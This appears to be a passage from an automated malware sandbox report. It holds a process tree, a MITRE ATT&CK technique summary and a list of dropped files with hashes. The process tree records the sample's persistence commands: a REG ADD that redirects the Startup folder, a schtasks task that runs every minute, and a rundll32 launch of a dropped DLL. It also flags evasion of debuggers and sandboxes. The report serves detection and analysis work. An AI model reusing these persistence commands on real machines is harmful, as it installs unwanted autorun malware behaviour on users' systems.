                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:7420
                                                                                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:6332
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\5BCA.exe
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\5BCA.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:1000
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe"
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                          PID:6716
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:1292
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\bd1299733e\
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                  PID:1688
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\bd1299733e\rnyuf.exe" /F
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                PID:8624
                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                            PID:1332
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                              PID:5740
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AB43.exe
                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\AB43.exe
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                            PID:6960
                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                PID:9128
                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                              PID:6392
                                                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                                                                                                MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                  PID:4868
                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                PID:7372
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                PID:4968
                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                PID:3960
                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                PID:8840
                                                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                                                                                                                                                PID:6832
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                PID:7616
                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                PID:9004
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                                                PID:3272
                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                                                PID:4692
                                                                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                                PID:8168
                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca
                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                  PID:7680
                                                                                                                                                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                  PID:9556

                                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                                Execution

                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                                                                                                Modify Existing Service

                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                T1031

                                                                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                T1060

                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                Privilege Escalation

                                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                                                                                                Disabling Security Tools

                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                T1089

                                                                                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                T1130

                                                                                                                                                                                                                                                                                                                Credential Access

                                                                                                                                                                                                                                                                                                                Credentials in Files

                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                T1081

                                                                                                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                                                                                                Software Discovery

                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                T1518

                                                                                                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                                                                                                7
                                                                                                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                                                                                                7
                                                                                                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                T1120

                                                                                                                                                                                                                                                                                                                Remote System Discovery

                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                T1018

                                                                                                                                                                                                                                                                                                                Collection

                                                                                                                                                                                                                                                                                                                Data from Local System

                                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                                T1005

                                                                                                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                                                                                                Web Service

                                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                                T1102

                                                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                  ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                  9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  9499dac59e041d057327078ccada8329

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  707088977b09835d2407f91f4f6dbe4a4c8f2fff

                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                  ca607b3f03dd62f3ac9648087f30f502540be9944ef38b3ca622c2b9bcef06b9

                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                  9d78de87d752902587a77d410de012b626dabf5d3a8576f90a9f1056f7a9866a442132defb3b99f2a12346571bcec29dccad5c27cdd59222a51518ceab3fc397

                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                  096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                  ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  aed57d50123897b0012c35ef5dec4184

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  568571b12ca44a585df589dc810bf53adf5e8050

                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                  096021eb5950ee16b7ec51756abe05f90c3530206e16286e7610b8a5a544a85e

                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                  ea0ee3a0762baa3539e8026a8c624ad897efe005faadcf1ff67ebfc555f29b912b24ad4342d5e0c209f36f5288867246bd1bdfed7df739e608a72fa7b4fa2d7c

                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                  5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                  63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  a3ec5ee946f7b93287ba9cf7facc6647

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  3595b700f8e41d45d8a8d15b42cd00cc19922647

                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                  5816801baeff9b520d4dfd930ccf147ae31a1742ff0c111c6becc87d402434f0

                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                  63efc7b19cd3301bdb4902d8ea59cae4e6c96475f6ea8215f9656a503ad763af0453e255a05dedce6dd1f6d17db964e9da1a243824676cf9611dc22974d687a6

                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  8690d4cc29a3c112ee7f6eb3981ac438

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  9e1613d8880a003ac49e52150853673afcd7c8be

                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                  68c926b002e8f4e0784481ea5b902f0a86991ef47787300c913c17821af510c9

                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                  4caafb3cc066b7bb366e849117f86b36e5bc5bef48ee66e7a2fbab83c3613fe119946f80524423ccc85434223fd1aefeab472005e0d1f462101ba080c43286f3

                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  75cc2f5992887fafdc1191426888fc73

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  5a65b76bb0f8dd66c9111845da79b52eed5efaef

                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                  6543da710620f1df9365634f181ea708feabdcf8ac2c82fa9f0bdb9597f0f8d0

                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                  043c30a2a75a3215cd05de069f09f2e1caef70584d48ffa67b59b9899d51b0e82fe63c467b1ba4fcfca90805f3769e7ef92d8f17da11598fa09da03b77dd1897

                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2T6cGRAhZgq_bFYW29boX7Uj.exe.log
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                  df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                  234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\7FJCDaF5QNpVqvwTLjFOrtsD.exe.log
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                  df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                  234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QozSu6C7eiPhsf6Cm7oPEeRg.exe.log
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                  df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                  234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\S6i5yHSWOumQUXQ7aq8mquvz.exe.log
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                  df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                  234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-O5LE9.tmp\uGP44CElcgUnGSypraDn8rKf.tmp
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  ffcf263a020aa7794015af0edee5df0b

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  bce1eb5f0efb2c83f416b1782ea07c776666fdab

                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                  1d07cfb7104b85fc0dffd761f6848ad176117e146bbb4079fe993efa06b94c64

                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                  49f2b062adfb99c0c7f1012c56f0b52a8850d9f030cc32073b90025b372e4eb373f06a351e9b33264967427b8174c060c8a6110979f0eaf0872f7da6d5e4308a

                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\5869148.exe
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  7aa6d9bfdbdfa9e112e7e0f46cc845f0

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  ab7a147ea36cc3766eebbe382e8caabba013f6ab

                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                  b7d035c385cc2ccdb11d4e1784908abb791e04672fe5f72e8523300c3db1426b

                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                  966746437dc07172b13c3928d356d638726492377d33b9d39bca8addcae2ec464d363a23de5e1c17a40f35689d88b5b28884a3f378861b5dcaf0a214a22a23ce

                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\5869148.exe
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  7aa6d9bfdbdfa9e112e7e0f46cc845f0

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  ab7a147ea36cc3766eebbe382e8caabba013f6ab

                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                  b7d035c385cc2ccdb11d4e1784908abb791e04672fe5f72e8523300c3db1426b

                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                  966746437dc07172b13c3928d356d638726492377d33b9d39bca8addcae2ec464d363a23de5e1c17a40f35689d88b5b28884a3f378861b5dcaf0a214a22a23ce

                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\2T6cGRAhZgq_bFYW29boX7Uj.exe
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  fb93137981cf5ba08d4ba71cc4062d6b

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  84a4fa4d1ebafc4fb66402d511ee7b3e77ac33d6

                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                  311b30440841f3abdf904d3603b3745a981a67358cdcf76055e8b225b7e3cd4a

                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                  d42dd2351979c33c801c4715e259d3dcc9c14735b986c0ce9e55433d504d9f3d863951bb909456d6dca18388d468dac496ce83fa1e1164637389be4c15f64cbb

                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\2T6cGRAhZgq_bFYW29boX7Uj.exe
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  fb93137981cf5ba08d4ba71cc4062d6b

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  84a4fa4d1ebafc4fb66402d511ee7b3e77ac33d6

                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                  311b30440841f3abdf904d3603b3745a981a67358cdcf76055e8b225b7e3cd4a

                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                  d42dd2351979c33c801c4715e259d3dcc9c14735b986c0ce9e55433d504d9f3d863951bb909456d6dca18388d468dac496ce83fa1e1164637389be4c15f64cbb

                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\2T6cGRAhZgq_bFYW29boX7Uj.exe
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  fb93137981cf5ba08d4ba71cc4062d6b

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  84a4fa4d1ebafc4fb66402d511ee7b3e77ac33d6

                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                  311b30440841f3abdf904d3603b3745a981a67358cdcf76055e8b225b7e3cd4a

                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                  d42dd2351979c33c801c4715e259d3dcc9c14735b986c0ce9e55433d504d9f3d863951bb909456d6dca18388d468dac496ce83fa1e1164637389be4c15f64cbb

                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\7EXXmv2tduvr3lEb9L3Y0xEF.exe
                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                  e917cb865fedd0d1f444a4911b146bbb

                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                  a8ddb7219dd15c0c7be99620c1a6c48fd83f39c9

                                                                                                                                                                                                                                                                                                                  SHA256

